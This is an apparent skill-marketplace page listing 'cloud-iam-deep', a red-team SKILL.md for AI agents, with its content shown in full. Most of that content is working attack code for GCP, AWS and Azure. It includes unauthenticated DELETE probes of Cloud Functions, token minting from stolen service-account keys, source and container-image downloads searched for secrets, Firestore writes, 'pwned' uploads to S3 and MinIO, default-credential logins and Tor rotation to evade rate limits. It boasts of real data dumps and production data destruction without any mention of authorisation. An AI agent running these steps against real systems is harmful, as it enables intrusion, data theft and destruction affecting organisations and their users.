cloud-iam-deep
GCP/AWS/Azure cloud exploitation -- Cloud Functions, Firestore, Cloud Run, S3, MinIO, Blob Storage, SA keys
Install / Use
npx skills add uphiago/recon-skills --skill cloud-iam-deepInstalls into whichever agent you are using.
SKILL.md
Installable skill definition
Quality Score
Category
SecuritySupported Platforms
Our assessment of cloud-iam-deep
cloud-iam-deep scores 89/100 on our quality scale, 502nd of 971 Security skills we index.
Its SKILL.md is 9.5 KB long, well organised into 37 sections with 14 code examples: a thorough specification that gives an agent plenty to work with.
With 1,280 GitHub stars, it is one of the more widely adopted skills in the catalogue.
Maintenance, license and trust
- The repository was last updated 29 days ago, so cloud-iam-deep is actively maintained.
- It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
- Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.
cloud-iam-deep compared with similar skills
All 4 of these similar skills score higher than cloud-iam-deep; compare them before choosing.
| Skill | Score | Stars | Updated | Format |
|---|---|---|---|---|
| cloud-iam-deep (this skill)by uphiago | 89 | 1.3k | 29d ago | SKILL.md |
| Agent-Reachby Panniantong | 100 | 86.6k | 15d ago | CLAUDE.md |
| headroomby headroomlabs-ai | 100 | 74.2k | today | CLAUDE.md |
| Scraplingby D4Vinci | 100 | 84.8k | today | MCP Server |
| crawl4aiby unclecode | 100 | 84.6k | 6d ago | MCP Server |
Frequently asked questions
- How do I install cloud-iam-deep?
- Run
npx skills add uphiago/recon-skills --skill cloud-iam-deep. The install tabs above show the steps for each supported agent. - Which AI agents does cloud-iam-deep work with?
- It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
- Is cloud-iam-deep safe to use?
- It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
- Is cloud-iam-deep still maintained?
- The repository was last updated 29 days ago, so cloud-iam-deep is actively maintained.
Skill content
View source on GitHubname: cloud-iam-deep description: "GCP/AWS/Azure cloud exploitation -- Cloud Functions, Firestore, Cloud Run, S3, MinIO, Blob Storage, SA keys" version: 1.1.0 revision_date: 2026-07-25 license: MIT category: redteam tags: [cloud, IAM, AWS, GCP, Azure, privilege-escalation, redteam]
Cloud IAM Deep -- Cloud Functions, Storage, IAM Exploitation
When to Use
- After finding Firebase API keys, Supabase keys, or GCP SA keys
- When a target uses serverless (Cloud Functions, Cloud Run)
- After finding S3 bucket names or MinIO instances
- One SA key can escalate to full cloud access
Cloud Functions URL Patterns (GCP)
https://{REGION}-{PROJECT_ID}.cloudfunctions.net/{FUNCTION_NAME}
https://us-central1-{PROJECT_ID}.cloudfunctions.net/api/feed
PROJECT_ID Discovery
projects = ["empresa", "empresa-app", "empresa-prod", "empresa-dev",
"empresa-1", "empresa-12345", "app-empresa", "admin-1a2b3"]
regions = ["us-central1", "us-east1", "southamerica-east1", "europe-west1"]
for proj in projects:
for region in regions:
url = f"https://{region}-{proj}.cloudfunctions.net/api/feed?limit=1"
try:
r = requests.get(url, timeout=5)
if r.status_code != 404 and len(r.text) > 20:
print(f"DONE {url} -> {r.status_code}")
except:
pass
Testing HTTP Methods Without Auth
methods = {
"GET": requests.get,
"POST": lambda u: requests.post(u, json={"test": "test"}),
"PUT": lambda u: requests.put(u, json={"test": "test"}),
"DELETE": lambda u: requests.delete(u),
}
for method_name, method_func in methods.items():
try:
r = method_func(url)
if r.status_code not in [401, 403, 404, 405]:
print(f"WARN {method_name} {url} -> {r.status_code} (ACCEPTED!)")
except:
pass
Real-world case (CRITICAL): 6 Cloud Functions from fitness tech platform:
- GET without auth -- dump of 15,800+ posts, 389+ users, real student data
- DELETE without auth -- confirmed destruction of production data
- Reflected CORS on ALL 6 functions -- drive-by attack possible
- 705 PDF tokens leaked
Source Code Buckets (gcf-sources-*)
gcf-sources-{PROJECT_NUMBER}-{REGION}
gcf-v2-sources-{PROJECT_NUMBER}-{REGION}
With SA key read permission:
const {Storage} = require('@google-cloud/storage');
const storage = new Storage({credentials: sa});
const bucket = storage.bucket('gcf-sources-706681009423-us-central1');
const [files] = await bucket.getFiles();
for (const f of files.filter(f => f.name.endsWith('.zip'))) {
await f.download({destination: '/tmp/' + f.name.replace(/\//g, '_')});
}
Service Account Key -> GCP Token Generation
import json, base64, time, requests
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding as pad
from cryptography.hazmat.backends import default_backend
def get_gcp_token(sa_key):
"""Generates a GCP access token from an SA key."""
now = int(time.time())
header = base64.urlsafe_b64encode(
json.dumps({"alg":"RS256","typ":"JWT"}).encode()
).rstrip(b'=').decode()
claims = {
"iss": sa_key['client_email'],
"scope": "https://www.googleapis.com/auth/cloud-platform",
"aud": sa_key['token_uri'],
"iat": now,
"exp": now + 3600
}
payload = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b'=').decode()
key = load_pem_private_key(
sa_key['private_key'].encode(), password=None, backend=default_backend()
)
signature = base64.urlsafe_b64encode(
key.sign(f'{header}.{payload}'.encode(), pad.PKCS1v15(), hashes.SHA256())
).rstrip(b'=').decode()
resp = requests.post(sa_key['token_uri'],
data=f'grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion={header}.{payload}.{signature}'.encode(),
headers={'Content-Type':'application/x-www-form-urlencoded'}, timeout=10)
return resp.json()['access_token']
# List IAM policy (find owners/admins)
r = requests.get(
f'https://cloudresourcemanager.googleapis.com/v1/projects/{project_id}:getIamPolicy',
headers={'Authorization': f'Bearer {token}'}
)
for binding in r.json().get('bindings', []):
if binding['role'] in ['roles/owner', 'roles/editor']:
print(f"ROLE {binding['role']}: {binding['members']}")
# List Storage buckets
r = requests.get(
f'https://storage.googleapis.com/storage/v1/b?project={project_id}',
headers={'Authorization': f'Bearer {token}'}
)
for bucket in r.json().get('items', []):
print(f"BUCKET {bucket['name']}")
# Test Firestore access
r = requests.get(
f'https://firestore.googleapis.com/v1/projects/{project_id}/databases/(default)/documents',
headers={'Authorization': f'Bearer {token}'}
)
if r.status_code == 200:
print("FIRESTORE ACCESSIBLE")
Firebase Open SignUp
curl --max-time 30 --connect-timeout 10 -s "https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=$API_KEY" -H "Content-Type: application/json" -d '{"email":"attacker@domain.com","password":"Senha123!","returnSecureToken":true}'
Firestore Public Access Test
curl --max-time 30 --connect-timeout 10 -s "https://firestore.googleapis.com/v1/projects/$PROJECT_ID/databases/(default)/documents/users?key=$API_KEY"
curl --max-time 30 --connect-timeout 10 -s "https://firestore.googleapis.com/v1/projects/$PROJECT_ID/databases/(default)/documents/stores?key=$API_KEY"
# Test WRITE
curl --max-time 30 --connect-timeout 10 -X PATCH "https://firestore.googleapis.com/v1/projects/$PROJECT_ID/databases/(default)/documents/stores/ID?updateMask.fieldPaths=fieldName" -H "Content-Type: application/json" -d '{"fields":{"fieldName":{"stringValue":"test"}}}'
Real-world case (CRITICAL): Delivery platform -- 3 Firebase projects:
- 4,000 stores (CNPJ, GPS, phone, menu) + PATCH write confirmed
- 204K WhatsApp conversations, 173K customer phone numbers
- 1K+ public MP3 audio files in Storage
Cloud Run Service Listing
const {v2} = require('@google-cloud/run');
const client = new v2.ServicesClient({credentials: sa});
const [services] = await client.listServices({
parent: 'projects/' + projectId + '/locations/us-central1'
});
for (const svc of services) {
console.log(svc.name, svc.uri, svc.ingress);
}
Artifact Registry Image Download and Analysis
# List repositories
r = requests.get(
f'https://artifactregistry.googleapis.com/v1/projects/{project}/locations/{region}/repositories',
headers={'Authorization': f'Bearer {token}'}
)
# Download specific image manifest
digest = "sha256:XXXXX"
r = requests.get(
f'https://{region}-docker.pkg.dev/v2/{project}/{repo}/{image}/manifests/{digest}',
headers={'Authorization': f'Bearer {token}',
'Accept': 'application/vnd.docker.distribution.manifest.v2+json'}
)
# Download layers
for i, layer in enumerate(r.json().get('layers', [])):
r2 = requests.get(
f'https://{region}-docker.pkg.dev/v2/{project}/{repo}/{image}/blobs/{layer["digest"]}',
headers={'Authorization': f'Bearer {token}'}
)
with open(f'/tmp/layer_{i}.tar.gz', 'wb') as f:
f.write(r2.content)
# Extract and search for secrets
# tar -xzf layer.tar.gz
# grep -rE "MIGRATION_TOKEN|APP_KEY|DB_PASSWORD" .
S3 Bucket Enumeration and Upload Testing
# Test if bucket is public
curl --max-time 30 --connect-timeout 10 -s "http://bucket-name.s3.amazonaws.com/"
# Upload (if writable)
curl --max-time 30 --connect-timeout 10 -X PUT "http://bucket-name.s3.amazonaws.com/test.txt" -H "Content-Type: text/plain" -d "pwned"
# Test common bucket names
for b in "target" "target-prod" "target-dev" "target-images" "target-uploads" "target-backup" "target-media" "download.target.com" "static.target.com"; do
r=$(curl --max-time 30 --connect-timeout 10 -sk -o /dev/null -w "%{http_code}" "https://$b.s3.amazonaws.com/" 2>/dev/null)
[ "$r" != "404" ] && echo "$b -> HTTP $r"
done
MinIO Health Check and Admin API
# Health check
curl --max-time 30 --connect-timeout 10 -sI "http://host:9000/minio/health/live"
# Admin API
curl --max-time 30 --connect-timeout 10 -s "http://host:9000/minio/admin/v3/info"
# Web console login (port 9001)
curl --max-time 30 --connect-timeout 10 -X POST "http://host:9001/api/v1/login" -H "Content-Type: application/json" -d '{"accessKey":"minioadmin","secretKey":"minioadmin"}'
# List bucket objects
curl --max-time 30 --connect-timeout 10 -s "http://host:9000/bucket-name?list-type=2"
# Upload
curl --max-time 30 --connect-timeout 10 -X PUT "http://host:9000/bucket-name/file.html" -H "Content-Type: text/html; charset=utf-8" -d "<h1>Pwned</h1>"
Azure Blob Storage Testing
# URL pattern: https://{storage_account}.blob.core.windows.net/{container}
curl --max-time 30 --connect-timeout 10 -s "https://storageaccount.blob.core.windows.net/container?restype=container&comp=list"
Pitfalls
| Issue | Solution | |-------|----------| | SA key revoked | Monitor usage, rotate keys carefully | | Rate limiting | Space requests, rotate IP via Tor | | False positive project IDs | Verify with simple GET before deep testing | | Cloud Run ingress=internal | Only accessible from VPC; need VPN |
Verification
# Verify SA key works
python3 -c "from google.oauth2 import service_account; creds = service_account.Credentials.from_service_account_file('sa.json'); print(creds.valid)"
# Verify Cloud Function
curl --max-time 30 --connect-timeout 10 -s "https://us-central1-PROJECT.cloudfunctions.net/FUNC" | head -5
Related Skills
Agent-Reach
86.6kGive your AI agent eyes to see the entire internet. Read & search Twitter, Reddit, YouTube, GitHub, Bilibili, XiaoHongShu — one CLI, zero API fees.
headroom
74.2kCompress tool outputs, logs, files, and RAG chunks before they reach the LLM. 20% fewer tokens for coding agents, 60-95% fewer tokens for JSON, same answers. Library, proxy, MCP server.
Scrapling
84.8k🕷️ An adaptive Web Scraping framework that handles everything from a single request to a full-scale crawl! Don't be shy, join here: https://discord.gg/EMgGbDceNQ and follow here for daily tips and tricks: https://x.com/Scrapling_dev
crawl4ai
84.6kOpen-source web crawler and scraper for LLMs and AI agents: any website into clean, LLM-ready Markdown. Run it yourself, or use Crawl4AI Cloud with one key.
Languages
Trust signals
From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.
